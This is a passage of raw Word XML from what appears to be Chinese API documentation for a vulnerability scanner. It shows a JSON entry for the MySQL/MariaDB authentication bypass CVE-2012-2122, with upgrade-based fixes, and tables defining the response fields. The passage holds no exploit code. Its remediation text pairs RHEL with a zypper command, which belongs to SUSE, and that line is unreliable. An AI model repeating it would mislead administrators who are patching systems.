      <w:r>
        <w:t>executeSeverityTip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>updateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1540971348,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inputSchemas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": []</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT042012001685",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "title": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mysql_Mariadb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 认证绕过漏洞(CVE-2012-2122)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description": "用户连接到MariaDB/MySQL后，应用会计算和比较令牌值，由于错误的转换，即使</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>memcmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>返回非零值</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>，也可能出现错误的比较，造成MySQL/MariaDB误认为密码是正确的，因为协议使用的是随机字符串，该Bug发生的几率为1/256。MySQL的版本是否受影响取决于程序的编译方式，很</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>多版本（包括官方提供的二进制文件）并不受此漏洞的影响。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "category": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remedDescription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "升级MySQL到最新版本修复该漏洞，攻击者可利用该漏洞绕过某些安全限制，也可能导致攻击者无需知道正确口令就能登录到MySQL服务器。漏洞修复后需要服务重启。建议业务不繁忙时修复。使用以下命令升级：\r\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nRHEL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zypper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> update -y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\r\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nCentOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> yum update -y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\r\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nUbuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apt-get update &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apt-get install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>permitExecuteTypes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executeSeverity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executeSeverityTip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>updateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1540971384,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inputSchemas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": []</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {......}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 104,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5522D865"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2124"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5517"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4CA88AF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4D46EB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54A7212A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AB0302F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44355271" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5032180A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78E75435" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D965D7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C8D04A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78F7A998" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2BD305AE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CD12029" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DCB8747" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3411AC73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="251182C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6DE40217" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="598DA193" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="297C7B8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="279C2FA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DDC0CCE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="76D5B483" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F312297" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B08ECF8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2077D870" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30B6FB5C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7F3FC944" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F7AF95A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>remedDescription</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BBCE3F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08822E5C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="053938AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修复建议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6D184D01" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D192B0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>permitExecuteTypes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="599509DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45A7EDA0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5653EF83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>允许的检测方式，1：版本对比 2：POC检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="16EEB1D3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="584F0617" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeSeverity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AA97B64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02EF9FC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DD10662" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测脚本执行风险，0：无风险，1：低风险，2：中风险，3：高风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="03CD70EC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E28BC6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeSeverityTip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BD17418" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D5F9609" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="270B9E87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行风险提示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="134FEDAD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B71B2F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updateTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53EBDEDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AD1870D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7336AB20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="24B2D116" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C5DD3D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>inputSchemas</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3695090B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E88C357" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FBA9A00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>输入参数定义列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B0BFFB9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回部分说明：</w:t>
      </w:r>
      <w:r>
        <w:t>rows中</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inputSchemas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1474"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6C937B4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65E4808" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39FE1D12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64ADFDEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01F34465" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2AF10893" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70EC5F07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37068E66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1191A677" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
